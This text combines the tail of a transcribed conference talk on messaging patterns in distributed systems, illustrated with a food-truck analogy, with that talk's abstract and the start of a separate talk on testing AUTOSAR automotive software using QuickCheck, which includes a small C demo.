is about 10 seconds. So the total time for an order is 2.5 minutes, 150 seconds. So if I'm the owner of this business I can very easily figure out what is the maximum revenue I can make with this model. And if I can see this I can see that I have a, you know, the revenue is strictly based on how many orders I can process. So if I'm the owner of this business the name of the game for me making more money is to optimize throughput. If I can get more orders in, not just get more orders in but I can have more people come in and place orders than I can make more money. And so a lot of e-commerce systems I've worked on are optimizing exactly the same fashion. They track fallout rates. They track to see how many people got in line but then left. That's really important, right? Because that's lost revenue. How many people walked by and saw the line was long and left? Basically it's taking too long to process orders. So if I want to scale this up I have to figure out which way to go here. Some of the other complications I have here, people don't like to wait. So if someone comes in and sees a long line they're just going to walk away. So if I have a web page that takes a long time to load I'm going to walk away from that as well. In fact I saw there was a study done on e-commerce websites to see how long someone would wait before abandoning that site for a similar site based on how long it would load. It was surprisingly low. It was something on the order of four seconds before they thought something was wrong. Four seconds doesn't sound like a lot of time unless you're waiting on a website for four seconds. With internet speeds the way they are now, well maybe not here but the way they are now, you expect a very low latency. I've run some tests on Amazon. If you run Amazon's website through the Wifrog web application optimization tester it tells you exactly how long it takes to load. A typical Amazon website page loads in about two seconds. And that's regardless of the page you're looking at. Absolutely insane. And if you're looking at how long does it take for the DOM to get loaded that's even shorter. That's something like 800 milliseconds. And how long does it take for the stuff above the fold that is things you see before you have to scroll, it's nearly instantaneous. You can't even perceive it. It's so quick. It's hard to measure but if you go to Amazon just check it just comes up almost instantaneously. So they've obviously optimized for that sort of thing because they know that they said something like every 100 millisecond latency cost them 10%. That's what they have, these measurements to figure that out. So they optimized that because they knew that a long line equals a customer walking away. And I don't want anyone to walk away. The other problem we'll have is we can't, we said we can handle 24 orders per hour. That assumes that there's just one person coming every two minutes. But there's anything we know about human behavior that's never any order in behavior. It's just chaos. So of course people get off on the lunch break at 12 o'clock or 11 o'clock or 1 o'clock and they go to lunch. Well that's everyone showing up at once. So I might even be able to play to do 24 hours, 24 orders per hour. It might be much less, it might be like 15 or 14 because everyone comes at certain times and I have this person out here that says, why is it so long? What's going on here? I'm just going to walk away. And we do this as well, right? You might go to the coffee shop, you open the door and you see the lines long and I'm really not that thirsty. And you close the door and you walk away. That's lost revenue. So the same thing we see in the real life again are going to be applied to a virtual world. So latency is going to equal someone walking away. So one solution, what could be just higher mo workers. We could try something like let's just scale out. That is let's have like another window with a guy that does everything else as well. But that would just double my throughput. If I just had two identical food trucks, that would have at most double what I could normally do, but it still doesn't really solve my original problem. So what you see people do here in restaurants and other human processes that can be broken down into a series of steps is instead of having one person do everything, you have each person do one step. This is exactly what came around from Henry Ford and the assembly line. That before Henry Ford, everyone manufactured cars one at a time. In fact, the advertising of the day was built around look how awesome and look how great a craftsman are for building cars. They had videos or not, yeah, they would show videos in the news reels of look how hard it is to build our car. But of course, they can only build one at a time. So what Henry Ford did was let's break this down to a series of steps and have each step done by one person and I'll optimize each step. This is what we're going to do here. Instead of having just two people do every job, how about I have each person do just one job and have each of them optimize each individual step. What I find here is that some people, if they're just doing one job, can do it a lot better if they're just doing that one job. The grill person, for example, I can grill how many items at once. However many can fit on the grill. So the grill person, even though their job takes each individual one takes 100 seconds or whatever I put in there, 120 seconds or 110 seconds, then yes, each individual one will take that long but I can do a lot more at once. So the grill person may no longer even be the bottom like but I wouldn't know this until I broke it up into each individual step here. So now the bottleneck in this system becomes ordering because that's the one synchronous part in this entire system. When a person comes up to order something, they're waiting and the cashier is waiting for them to be done with the order. But with this optimization, it's not just quadruple my throughput but whatever 120 divided by 24 is. That's what I was able to get up to. Because I was able to break each individual piece down and have each of them do orders in parallel now. So now my bottleneck is just the number of orders I can take per hour. And on the back end, it can handle that throughput. So I think I had it as take order takes 30 seconds. So that's where I got that number. Is that basically if it's one order takes 30 seconds to take, then an hour divided by 30 seconds is 120 orders. And you'll see this in restaurants that they're highly optimized to take orders. And Starbucks is the same way, right? You go to coffee shop, you take the order and then you see these people over here sort of milling about on the other side. Now there are some complications to this model. In our original model, everything was synchronous in that the person didn't walk away from ordering until they got their food. So they had to guarantee that I know as a customer, I'm not leaving until I get my food. With this model though, because it's a series of steps, the customer just has to sort of trust and sort of mill about on the side over there, just under the assumption that eventually I will get my order. This is how most e-commerce systems work, right? It's not like when you go to Amazon.com, you hit submit order and there's like a series of oompa-loompas or something that run off and go like off the shelves and start taking off like, oh god, we've only got two seconds to forward the page loads. We better go procure all these shipment. It doesn't work that way. So we have a long running process to be able to deliver that items to our customers. But this does have extra complications. Again, our transaction is no longer synchronous, so that means if something goes wrong, the user doesn't have immediate feedback. They've got somewhat of a back channel to be able to do that. We had the issue of just putting all the pieces together. I watched this show in the states called Kitchen Nightmares, it's with this chef from the UK, Gordon Ramsay, who specializes in yelling at people and telling them how much their effing suck and that sort of thing. And over and over again, when he goes into these restaurants, the key problem they have is the lack of organization. They just don't know how to organize their work. So in order for us to be able to build systems that have organized work, we have to decide up front because we have to write that code. So we do have to decide what step does what and individually we know what responsibilities go with each. Now when we have a system like this, now that we have multiple people doing multiple things, how do people solve that in the real world? Well, it's messaging. They use verbal, nonverbal, durable, non-durable synchronous and asynchronous messaging in order to fulfill this whole operation. So let's seek to see how messaging can help solve this problem and apply it to our e-commerce website. So let's look at the very first interaction, which is the customer placing the order. So in this interaction, this is going to be a synchronous communication. When I'm coming into place in order, typically a customer doesn't like to be a fire and forget so it's not a one-way message. I need to get some sort of confirmation back that yes, indeed, you have received my order. You don't typically see someone just yelling at an order and walking away and be like, okay, am I going to pay for it? That sort of thing. So it is a blocking operation. That's okay though because the customer expects that experience. They don't expect a fire and forget message where I go in and I submit an order and then I wait for them to come back to me. In this model, they wait to get paid and then, you know, wait to make the payment and confirm that yes, you have successfully placed your order, now go stand on the side. So this is going to be a synchronous affair here. It's also non-durable. So the order is requested verbally. So this is also most efficient means of doing so. It would be kind of lousy if we forced our customers to write down the order and then hand them to us. Like, am I doing the work for you there? I mean, that doesn't make any sense. So if we want to have a really highly efficient ordering process, non-durable would be the way to go here. We do run some risk though in that there's something goes wrong with taking the order, then I don't have any record of it. Right? If you go to that website and you hit post order and something goes wrong, you get that yellow screen of death and then you want to resubmit and you're like, huh, did they charge my credit card or not? I don't know. So it does run some risk there. But in any case, both the cashier and customer are blocked from doing anything else during this interaction. And I can only take one person's order at a time and so everyone gets in line. So in our messaging world, we might model this as a HTTP request. This is all just pseudocode. I don't know if it's even actually real HTTP, but I get the idea. And in this case, I'll post up to the order API, my name and what I want to order. And what they'll give back is information. Now the cashier is what dictates exactly what information they need. So they do tell me, I need your name and what do you want? I mean, that's typical of what happens when you walk up to the cashier. What do you want? You know, they're telling you what the interaction is going to be here. So I can't just order any way I want to, the cashier is dictating this interaction. In this case, by posting up an order, I get the HTTP 201 created response on the way back and a location of where to go see the status of my order. And all of these sort of offline processing systems, they typically see that I need some way to get back at what I've done because I want to be able as a customer to see what the status of my order is. So in this case, I can give them back a link to say, and here's where you can go find about the status of your order. Of course, Amazon does this, right? You place an order and it says your order number is this and click this link to go see the status you order. And you can click that at any time. So that's kind of the easy part. Just a first interaction. That's pretty much how the original model went. Now we have to figure out what to do with all these other people that are going to be involved in our process. The dressing, the packing, and the grilling. Well, dress, grill, pack, and deliver. So we have some choices here. Do we do durable or non-durable messages? Who figures out what the step should be? Is every person individually figured, like each time they get an item, do they figure out what the next step is? Or is that managed by someone else? When something goes wrong, how do we manage failures? And eventually we look at, too, how can we make this go even faster? So in our case, when looking at durable versus non-durable, if I go with non-durable messaging, that's equivalent for me to saying, in a website request, I'll go make a WCF call to something else that is then going to make the order. Well, that's, again, a non-durable transaction. That's non-durable messages. So if something goes wrong, the message is lost. So I would likely want to do a durable message here. And we typically see restaurants do the same thing. They're not yelling out orders to the back. They're putting on a piece of paper or they're putting it in the computer, and that's something that gets durable and is actually passed down to the next person. So in this case, I want to manage a couple things. First of all, I don't want to necessarily have each person have to figure out what the process needs to be. So I will send them a message to the first person to say, I want you to address this. And this is the order I'm going to be referring to. So just two pieces of information. One is the order that I'm referring to, and what are the steps that need to be processed as part of this? And this is actually, what's nice about this pattern is that each step, they receive the message, they process it, and then just pass it on to the next person. So this is what you see happen in restaurants. They have a ticket, and sometimes you actually see the physically the ticket move from station to station, and they just look at it and say, oh, this is my thing. Okay, done. Sling it on to this person. So each of these becomes an independent process with their own cues in order to manage the list of work that they need to go through. This pattern right here, where I have a list of places to send the message to, this is called the routing slip pattern, because instead of each step knowing what the next step should be, I just include that in the message so that there's one person deciding what the over set of steps should be, and each individual worker doesn't make that decision. They just simply do their work and pass it on to the next step they see in the list. Because not everything needs to go through every single step. If someone orders a salad, it doesn't need to go to the grill. So I just go to dress and pack. So there's no reason for me to pass that information on to the grill person if it's just a waste of time for them to look at and say, this doesn't belong to me. Go on to the next thing. You see this often times with computerized systems in restaurants, where if you have multiple stations, only the orders that actually relate to that station show up on the screen. If there's something that doesn't need to be grilled, it doesn't show up because that would just waste that person's time looking at something that has nothing to do with them. So with the routing slip pattern, I can decide up front what my steps should be, and then my individual workers can be a lot dumber and just do their work and pass it on. So you'll see this very often done. Oh, I had two options as well here. So you can see here that my order is not actually inside the message. I'm including a link to the actual order, like what the person actually ordered. So you'll see that sometimes as well, that the ticket is just a number, and the actual instructions are delivered in a different mechanism. Sometimes I do see that the actual physical thing that goes from place to place also includes the instructions for the order. So we have a burger place in Austin, Texas called Mighty Fine because they have Mighty Fine burgers. And they have this interesting process in which the order is written on a paper bag, what you want. So it's upside down because the cashier is reading it that direction. So you as a customer write your name on it, and as you say what you want, they'll circle things on the bag. So in this one, they're getting a burger, it's a cheeseburger, it's red, which means it has ketchup, and they're getting french fries as well. So the instructions are also included on the message itself, the message being the bag. Also included is, it's also the delivery mechanism for the order. So they'll put the food inside the bag and pass it on to the next step. So it goes to the grill step first, they put the burger in the bag, it goes to the fry step next, they put the fries in the bag. So we could do that as well. We could continue to augment our message as we pass it along with the results of what we've done, or we could do something like just include a link, and we actually go back to a database or something to actually do whatever we need to do with that item. Both options, equally viable, just sort of depends on how you want your process to flow. The plus side to this approach is that there's no shared state between processes. No one's fighting over bags. They just have, when they have the bag, it's theirs and theirs alone, so there's no such thing as concurrency problems in this model. With a shared state model, that's equivalent to somewhere where there's one bag that everyone has to go through, and maybe the burger and fries get done at the same time, so they're fighting over bags. So in this model, it's nice that there's no concurrency problems, no deadlocks, everything is localized to the bag. It is a little bit more difficult to deal with because if someone orders a lot of food, my message could get big, and that could be difficult to transport. So if someone orders 20 burgers, it's not going to be able to work to stuff that in one bag. But either way, my message flows from point to point. It goes to the dress station first, queues up there, goes to the grill station next, queues up there, it goes to the pack station next, queues up there. When Pacquie's done, of course, they'll go ahead and yell out and say, order up, and they're done. So yes, queue for each step. Asynchronous durable queues to make sure that I can recover from failures. So if I drop a burger, I don't lose the message, like my bag's still there of what to do. So I have some history of what's going on there. This as well, because whenever I pass the bag onto the dress person, I just drop the order on the counter next to them. I don't tap them on the shoulder, hey, I got an order for you. Here you go. You got it? Okay, good. I'm walking on then. Now, I just drop it to the side. I can go back to taking orders. So with asynchronous messaging between these different points, I can minimize the amount of time communicating between each individual process and maximize my time actually doing work. And of course, each different station gets to decide how they get to do the work they're doing so independence is maintained and it can scale up each of these individual stations as well. If I need to have two people doing dressing because that's getting bottlenecked, I can do that. I can actually have like pack person come off and go on to dress. In our systems though, it's pretty easy for us to just scale up. I can just throw more threads or cores at something and go that way. So we can do that in our system as well. Just looking at now that I'm broken down into individual steps, it's a lot easier for me to scale up individually those individual pieces. So this is about as fast as I can get right now. If I want to get any faster, the way people typically do this is start to relax and guarantees. So looking at my current bottleneck is taking orders, right? I can only process as quickly as I take an order. So how can I make that go faster? One thing I can do is I can notify the back people before a new order is actually completed. You will see this in restaurants sometimes. You order something, before you pay, they yell out to the back, burger up, and so someone in the back can actually get started on your order immediately. So you're not waiting a long time in the back. In this case, we may have to, because we're just yelling out before the person is actually paid. So what's the problem of, well, what happens if they don't pay? What happens to that burger that I started? Well the same things we do in real life we could do in our system. We could say, eat at some cost or just like the cook eats it, I don't know. They just don't worry about the burger that's got made and down the line. We could have a compensating action. So we send another message to say, oh cancel that burger and have them cancel that order. So we could basically ignore it. We could retry it. So if something goes wrong and say, did you get that burger? So those are basically our three sorts of items there. So with this one, I can start yelling out orders more quickly and hopefully that gets people's orders out the other side more quickly as well. And for that case, I would use a non-durable asynchronous message because I'm not certain that it'll go through OK. So if they get it OK, they're still going to get the original order that comes through on the paper bag that comes down the line. But if I could yell earlier, maybe it can help them get started a little bit quicker. Now this is sort of a last resort thing. If I really want to optimize my throughput, I start to do these things of relaxing guarantees and saying failure is an exception. In these cases, I may not have to have such hard guarantees, but I have to look at those individual situations at each time. I noticed too as well that some websites that have you go through a series of steps will often sort of pre-validate things as you go. One example we had was there's an e-commerce website we're working on that had step one, you put in your information, your payment information, step two is you put in your shipping information, step three you confirm, and then you finally place the order. What they would do though is after you went to step one, they wouldn't synchronously verify your account. It was asynchronous so that they would send a message to say, OK, it's going to take them a little bit to fill out our shipping information. Let's go ahead and have the payment processor pre-validate this so by the time I get to confirm, I should have an answer back. They're not waiting when they hit submit. Oh, God, I got to hit the payment gateway and wait for that response to come back. We do definitely see that sort of thing done in the systems we build. That is our process for actually processing orders. It went from just one guy doing every job to a bunch of guys doing a bunch of different jobs, and I had to introduce some new patterns in each of these places in order for me to actually fulfill this order. I had to introduce non-durable synchronous messaging from the customer to the cashier, and then I had to introduce durable asynchronous messaging for all the other steps. The last thing I need when I actually need to deliver my order at the end, that's why I asked the person's name. I asked the person's name because I have to have some way to let them know at the end that this is your order. That name is just a correlation identifier between all those different steps in order for us to actually be able to fulfill the order at the end. A lot of our systems, we have natural correlation identifiers like transaction IDs, names. Sometimes we have to make it up. Some restaurants you've been to, you probably had to take a number, and your number signifies your order rather than your name because two people got the same name, so you may have some ambiguity there. That is the right side. The right side is actually doing information, creating an order, and delivering it on the other side. Let's look at our reads because reads are often the things in a distributed system we sort of forget about, and we have the same sort of constraints and problems on this side that we would also see in the real world. The reads in my system in the food truck here are going to be around reading the menu, of course. A person goes up and reads the menu. This reading is actually really cheap. It's practically free to read the menu. There's no cost for me to look at the items on the list and then order something. We also see that that menu is built specifically for the customers. It's built to inform them and help them decide on what they want to eat, and maybe they're to entice them to say, look at this. Don't you want to buy these extra good items, things like that. The design of that is not built around how me as the owner wants to manage the menu. It's built around selling and providing a menu for the customers. I as the owner of this business are not using that board outside to manage the menu. I've probably got Excel or maybe an Access database in the back end to actually manage what item is going to sell. All the business rules about what I'm selling when are probably in that system. I might have analytics as well to say, how well is this thing selling versus that to tweak and figure out what I should promote over others. I might have marketing involved to figure out, on Friday we're going to have this sort of special. But when I'm coming as a customer, I don't know that. I just see sandwich board, how that came to be. I don't know. I don't care. But gosh, it sure is easy to read that board. This is not how I see typically systems built. Systems are typically built with the same backing store managing both the back end concerns of business rules and management forecasting as well as the front end, which is just read. There's no page on a site that allows me to change the product name. Yet, if it's going against the same backing stores all the management of information, then I'm probably trying to solve two different problems with the same database, which can be problematic. The picture I typically draw for customers is that this is equivalent to, instead of having that sandwich board on the front, this is me putting the Excel spreadsheet out there. Saying, hey, you want to order something? Check out my management tool to see what items I have. I've got effective dates on those prices, so ignore the ones that aren't for this day, because those prices are affected next week. I know it's cheaper next week, but you'll just pay more today. This is trying to use the same model to solve those two very, very different problems. It's also more expensive for me to load up Excel, of course. It's more difficult for that to do. Just like the management applications I typically see are built around managing individual items, not showing and displaying lots of items that I typically see in e-commerce applications. In order to do those back in applications, support things like search. SQL servers are horrible at searching. It's absolutely awful. We'll often see people use different technologies for the front end to be able to search things effectively, things like Lucene, Solar, things like that that are much, much better at searching. People just wouldn't dream of doing that in the real world. I see people saying, yeah, I'll just wildcard search SQL and cross your fingers that actually comes back. I probably would want two very different solutions to handle those two different things, because this guy that comes up to see the Excel document is just like, I don't know. This is taking forever. I don't want that. I just want a very nice, clean look at my menu. A better solution here would be to have tailor-made data stores for those two different, very different concerns. A data store for the front end that is highly optimized for reads, and a data store for the back end that is highly optimized for management. Someone looking back on Andrew. Well, there's a talk actually right before this that was on a topic very, very similar to this, and looking at saying that there are typically two very different kinds of things that happen to my system. There are the commands that affect states, that change state, and then there's a reads that don't affect states. I'm just reading information. I'm not changing anything. The concerns of those two things are very, very different. They have very different heuristics in how the applications typically work with them. In the back end, I may be only working with one product at a time, and they don't care about viewing all the products, where the front end is all about speed and seeing all the products at once. The trick, of course, is that middle part. What is that middle part? Is it replication? Well, replication means I get a copy. That means whatever management my backend guy uses Excel, well, they're just getting a copy of that Excel document. That really doesn't give me anywhere nicer. It's still a model built for the back end, but I just have it copy the front end. It could be an option for simple models. Because this is a separate process, separate database, I could build something tailor-made for what the front end does and have a read-optimized model. People call this a lot of things. They call it view model databases. They call them reporting models. I usually call it reporting models for my customers, because as soon as I say cash, I'm like, what, it can't be stale. Well, the world is stale. The sun could have blown up eight minutes ago, and we would just find out now, because it takes eight minutes for the light to actually reach us from this earth, sun to the earth. When someone views a website, it's immediately stale. It's not updating real time, unless you're like signal on, I guess. But no matter what, it's going to be stale information in the front. And a lot of times, the e-commerce companies I work for, prefer it that way. They don't want real-time pricing. I only feel like an oops, like oops, I misplaced the decimal, and it's now, what was $100 is not $1 because I missed a, so there's always an emergency. But typically, back ends, they say, I want this price effective on this date. So even delivery of those prices at the front end is managed very specifically. The e-commerce company I work for that did the whole nine minute response time. The way they manage it, it was just a nightly ETL job that took the pricing information from the back end main frame and pushed into a database in the front end. Like, yeah, okay, and all the product owners knew that. So they knew that I could muck around with prices all day long, knowing that it's not going to be seen until tomorrow. As soon as you go to this model, though, prices are shown immediately, unless I do extra features to be able to support future prices and things like that. Okay, so looking at the menu here, ideally, I'd have the product owner doing, or the business owner doing his management in his own application, however he wants to do it, and then I can optimize my front end to be able to have whatever data it needs. So you see this, right? The owner will have his Excel spreadsheet on his laptop that he manages the menu, but for a menu from the customer's point of view, it's just that front end board there. So it's cashed, it's as close to the customer as possible, and it's highly efficient to read from that. And yes, it's stale, but that's okay because no money is lost for it being out of date from when. It's like the second the business owner hits Enter on Excel, it's got to go like real-time update in the back end, things like that. So the picture I often show here is that when you go to restaurants and catalogs and things like that, they're making a trade-off saying, I can ship 1,000 catalogs to 1,000 people that has completely free reads, but it's going to be stale. So it's free to read, but it's not stale. The existing system they had with the nine-minute response time, they're making real-time calls to the processing and pricing services to figure out prices. So they'd ask for, okay, what's the price of the product? Okay. What's the price of the product? I just told you, it's this again. And they make those calls. And I told them this is equivalent to when someone walks up to the cashier, you have to call someone to ask what the prices are, wait for them to get back to you, and then give the response back. What you want to do is to have that information local right next to you to be able to show to people for absolutely free and just trade off a little bit of staleness over that course. And they're okay with that in the real world. This is obviously how no one would ever have to call us to central office to have prices. Yet in the systems I see, I often see these WCF calls to pricing service, like, do you realize what you're doing here, right? You're making calls to someone to see what the price is, and it probably hasn't changed since you last called them two seconds ago. Just something to think about. Now the key here though is that no one can change the menu. The menu is not owned by the restaurant, it's owned by the product owner or the business owner. So no one can go ahead and just like add new items and change prices willy-nilly. It's still driven by the business owner. But that's nice though. If we know that it's immutable data, that is, someone else owns it and we can't change it based on rules that we have, then we can optimize our storage for being able to display to people. So in the real systems I work on, like, if it's immutable data, I have no problem denormalizing it because if it's not changing, I don't have to worry about updating a lot of rows for this information that either never or very, very rarely changes. So in e-commerce systems I work on, I often make, you know, if it's ordering something, I'll just go ahead and pull the product name and the product price and store it in the order or store it in the cart because that's cheaper than me having to go back to that service every single time. And we ask the business, like, oh, what if the name changes to the product? Like, really? I mean, usually these things are driven off feeds from all sorts of other people. That doesn't change. There's not that many typos that go in here. So if there's a typo, well, we'll just wait for the nightly update or whatever and you'll be fine. So even though the data is duplicated, ownership is preserved. So the restaurant does not own the menu, it's the business owner that owns the menu, they just own the delivery of that menu to the customers. But if something does change in the menu and I want to notify the front end that something has changed and they need to update the prices, this is where we can see PubSub come into play. So I might have that there's some menu updated that I need to notify the store to say, the price now is on Tacos is $1.49. I could have these menu updated events being granular, that is, for each time an item is updated I let them know. Or it could be an all at one sort of thing, that I just ship them, here's the entire menu, have at it. And I see a lot of these systems that are built around mainframes do that. They'll just have a flat file dump of their product catalog and say, I don't know what's changed but, you know, go figure it out. The reason why this model is nice is that as soon as I have more than one store, I don't have to manage all these different menus at once. Whenever something changes in my menu from all the different stores I have out there, I just send all those updates to all the different people and I don't have to have them calling into me, what's the menu, what's the menu, what's the menu. Whenever it changes, I let them know. And they don't have to poll me to say, hey, has anything changed since the last time I called you an hour ago? I see people typically try to solve it with caching. Caching still assumes that it just goes stale after a certain amount of time. With PubSub, I can notify you when it's changed so you don't have to keep polling me to figure out when things have changed. It's durable, of course, so I'm not going to call them and just verbally tell them. I'm going to give them price sheet and the menu sheet and send out to the other people. And as I bring more stores online, it just becomes a matter of emailing or faxing, if my God, if they still do that, to all those people that need the new menu and it just goes out to all of them. The other nice thing about this, of course, is if Store A closes, Store B and C will still receive their menu. So they don't have any, you know, don't really need to know about any other stores that are there. They just care about their specific menu and they can get what they need. If anything gets delayed at the delivery from one store to another, then again, it doesn't affect the delivery from, you know, if the Postal Service messed up delivering the menu from the business owner to Store A, well, that doesn't affect the menu delivery to Store B. So I don't have to worry about individual stores competing with each other. So, some parting thoughts. When we're thinking about building systems that need to communicate with more than one process, as soon as we cross that gap from synchronous one thread for one request and start building up into and breaking these things out into other systems, we have to keep in mind the same constraints we find in the real world also apply to the systems that we build. The only thing that's changed is that latency is shortened, but it's not zero. So the same sort of problems that we have of, I call someone up and expect them to reply immediately, but if they don't pick up, then I'm just blocked, this is the exact same sort of thing we see happen in virtual systems as well. I also will, it's kind of, I've been doing messaging for about five years now, and I still can't go into a restaurant or a business without looking around and trying to figure out how I might design this human process with messaging because it's so in your face what's going on that I like to go and look at those things because those solutions that I see people using in the real world, I can just take those exact solutions and apply them to what I'm doing in the virtual world. Now the way this all goes together of course is with messaging. That's how we need to cross these bridges between these two things. But it's just important to keep in mind that there's no one solution for all of our messaging needs and depending on the picture we want to draw, the interactions between our different processes, that'll be the solution that we decide for what kind of messaging pattern and style we'll use. So thank you very much. All these slides will be on my GitHub, github.com.com.au. And thank you very much and enjoy lunch.
|
So you've decided to try messaging. You've built distributed systems before - everyone's called a web service, right? You've looked at MSMQ, RabbitMQ, Azure Service Bus or ActiveMQ. But where do these technologies fit in? How will working with asynchronous, durable messages change the way you build applications? And most importantly, what about the UI? Luckily for us, messaging is a problem already solved centuries ago. It's just up to us as developers to use real-world metaphors to guide the building of our systems. In this session, we'll look at telephones, postcards, magazines and more to see how messaging patterns perfected with human interaction can be leveraged in messaging systems. We'll also look at complex processes and how organizations large and small can collaborate on complex tasks, and how we can model them in our systems.. Finally, we'll see where messaging sits in the overall space of distributed systems, where it fits and where it doesn't, just like we as humans have evolved our communication over the millenia.
|
10.5446/51443 (DOI)
|
Can you hear me? Great. Okay, so for those who don't know me, my name is John Hughes. I'm a long-time functional programmer. I've been a professor at Charlottes in Gothenburg for many years. And in recent years, I've become very interested in testing. And I have a company called Cubic that works with that. What I'm going to tell you about is the biggest project that we've done so far at the company. I think it's quite exciting. So what's it all about? Well it's about the software that goes into cars. So as we all know, cars contain lots of processes nowadays, between 50 and 100 in a modern car. And so there's lots and lots of software in them. And because there are lots of different processes, lots of different components, then it's a concern that all of those processes can actually talk to each other, that the software in the different processes is compatible. And this is quite a problem because for a car maker who puts a car together, the maker will buy lots of subsystems. They'll contain multiple processes. They'll contain software from different suppliers. And of course the suppliers will all have confidence in their own software. But when you put the car together, guess what? It may not work. And there's a risk of an integration nightmare at that point. Especially since there are actually two tiers of suppliers. So you buy the hardware from one supplier and then the software from somebody else. So there's a lot of different software in the car. Okay, so what's the solution to that? Standardization. And there is indeed a standard that's called Outisar, Automotive Open System Architecture, which is developed in cooperation by pretty much every company you can think of in the vehicle industry. And that specifies how vehicle software ought to be built. Now what we've been working with is just a part of that. Outisar covers every aspect of developing software for cars. But a part of it is what's called the Outisar basic software, which is supposed to run on every processor in the car. And I've got a diagram of it here. It consists of a number of clusters. You'll recognize Ethernet. So there's an Ethernet stack. The CAN bus is a bus that's very commonly used in cars. FlexRay and Linn are two other communication protocols. Common services provides routing between all of those protocols. And the diagnostic cluster is the thing that records fault codes when something happens as you drive so that the garage, the service station can find out what happened when they serviced your car. So all of this stuff is supposed to run on every single processor. What does the picture show? Well, those little colored boxes that say things like COM and PDUR, those are individual modules or individual components. And they're clustered together in these clusters. And one of those components, just one of those little boxes, is described by a PDF that can be a couple of hundred pages long. So there are literally thousands of pages of specifications for this stuff. Now you would think, would you not, that if this software is going to run on every processor, it would make sense for the entire industry to get together and build an open source implementation that would be the same and very, very well tested. Isn't that what you would do? Is that what they've done? No. No, what's happened instead is they've standardized how these components are supposed to behave. And then there are many competing implementations. And the problems can arise when two different implementations make different interpretations of the standard. Then you try and get them to talk to each other, and they just can't. And you maybe can't even tell whose fault it is. So we got involved in this because Volvo cars were concerned about the integration problem. And they want to even to be able to do things like say, well, we'll buy basic software from one supplier, but maybe we don't like their CAN stack. Let's take it away and put different suppliers CAN stack there, because we think it's better. Of course you should be able to do that. It's all standardized, it should all just work. So that's the theory. The whole idea behind this standardization is that car manufacturers should be able to pick and choose from the suppliers and make them compete with each other. And by doing so, get better products and better prices. But guess what? It doesn't always work. Or perhaps I should say it never works. So what happens instead is the system integrators, the car builders, they go through this nightmare of trying to get all of the software to work together. And if they buy all the software from the same supplier, of course, then it's the supplier's fault and they have to solve the problems. But Volvo don't want to do that. They want to pick and choose. And that means it's Volvo's problem when it doesn't work. So what was their plan? Well, their plan was before buying any of this basic software, get it certified. Who are S-Pay? S-Pay are the Swedish certification agency. They're like TUV in Germany. So Volvo's plan is only to buy software after S-Pay certifies that it conforms to the standard. That's great. How on earth can S-Pay tell? Well, because they will run tests developed at Qwik, our company. So that's where we come into the picture. How on earth do we think we can develop tests that will catch any deviation from the standard? Well, we're going to do it using a testing tool called QuickCheck. And this is something that Kuhn Klassen and I came up with back in 1999 in Haskell. So it draws very much on functional programming ideas. And Qwik, the company, was founded to market a version of QuickCheck in Erlang in 2006. And that's when I took one foot at least out of academia and stepped into the industrial world. And since then, I've spent a large part of my time trying out QuickCheck to do all kinds of challenging testing and having a whole lot of fun. So I've told you the name of QuickCheck, but what does it do? Well, we take or we write a formal specification of the API that we're going to test in a special form. And when we've done that, we generate random sequences of API calls. And we run those tests and we see do they conform to the spec. And we keep doing that until eventually one of the tests will fail. So this kind of random testing, it will try all kinds of combinations that you would never think to write a handwritten test case for. And as a result, this is a very, very good way to provoke errors that otherwise could remain undetected. But once you've found a test case that fails, these test cases, they can be 100 calls long. So they're very hard to diagnose. Usually though, the problem just depends on a few of the calls and the rest are not relevant. So the next thing that QuickCheck does is figure out which calls those are and boil the test case down to a minimal failing example. And those are the ones that we then try to debug. And so you get very effective testing by the random generation. And then very easy debugging because you get very small reduced examples. OK. That's all a bit abstract. I'm going to do a demo. I'm going to do another demo tomorrow. So I'm going to do quite a lot of this stuff. But today, I'm going to test some of the standard C library functions. So it's just to show you what a QuickCheck specification can look like. So I'm going to test F writes that writes some bytes to a file, F read that reads a number of bytes from a file, and F seek. And that sets the position in the file where the next read or write will take place. So let's see what that looks like. The way that we test this kind of code is by building, well, but first of all, generating test cases that are a sequence of API calls, well, surprise, surprise. But then modeling the state of the system. So for every API call, we'll formalize, we'll write a function that specifies how the model state is transformed by that call. And then we write a bunch of post conditions that compare the results from the actual system under test to the model of the state. And all of this stuff, we write in Erlang. So we can test all kinds of different software in this way. We can test Erlang software. We can test C software. But no matter what we're testing, we write the specification in Erlang. So we're taking advantage of the concise and mostly likely to be correct nature of Erlang to make the specifications easy to write. For example, I might generate a test that writes one byte a zero to the file, seeks back to position zero, the beginning of the file, and then reads one byte. So that might be a test case that I'll generate. How can I model the state of the file? Well maybe by the list of bytes that I think should be in it and the position that I think the next read or write should occur at. So when we start off, then, okay, what? Watch this. When we start off, how cool is that? Then the file is empty and it's at position zero. After we've written one byte to it, the file contains a zero and it's at position one. So the seek, then it still contains one zero, but the position is zero. And now the post condition for read will say that if you're in that state and you try and read one byte, you should get zero. Okay, so that's the approach that we're going to take. Let me run a demo. So I'm actually going to start with an even simpler C code just to get going. So I take it, everybody can read and understand this code. All it does is put an integer into the value n and then provide a get operation to return it. So I'm going to test code using the Erlang shell that Brian showed us in the last talk. So I will need to compile that C code, which in this case I can do like this. And having done so, then it's, I can call it from an Erlang put get module. Let's put three. Let's call get. There we are. I got three. If I put four, now I'll get four. So it's very easy to call C from Erlang for testing purposes. So what does the specification look like? Well, here it is. I have to model the state. So I have to say what state we'll start off with and we'll start off with a state of zero. Why? Because that's the initial value of n. We specify how to generate each command. So we'll generate puts by calling put get put with a random integer. What is the state transition when we call put? Well, when we call put n, the new state becomes n. So I just write a state transition function that returns the modified state. This specifies how to generate a call of get. It's very easy. And here's the post condition for get. It says that the result that get returns should be equal to the model of the state. Very simple. And then the property says, for all test cases generated containing puts and gets, when I run that test, then the result should be okay. What does that mean? It means there should be no exceptions and all the post conditions should be true. What's this line? This line restarts the C program. I'm doing that in each test just so that we start with a known value, zero, in that variable n. It's a slightly heavy way of doing it, but it works. Let me compile that specification. It's airline compilation. What can I do with it now? Well, I can run QuickCheck and I can give it the property, that's the last piece of code that I showed you, as an argument. When I do that, QuickCheck will generate 100 random tests and run them all and in this case, they all passed. Surprise, surprise. Okay. So, that's a very simple example. What happens if there's a bug? Let me insert a bug here. I'll say if n is not equal to 11, then update it. Once n becomes 11, it'll get stuck. Let me recompile the C code and rerun the tests. Many of them pass, but then one of them fails. Now what's all this output? This shows us what happened during the test and you can see that it was a random test. It's got a large number of calls. In here, we put 11 and then we did some more puts and we made a get that returned the wrong result, but you can see you wouldn't want to try and diagnose that. So instead, we let QuickCheck do its 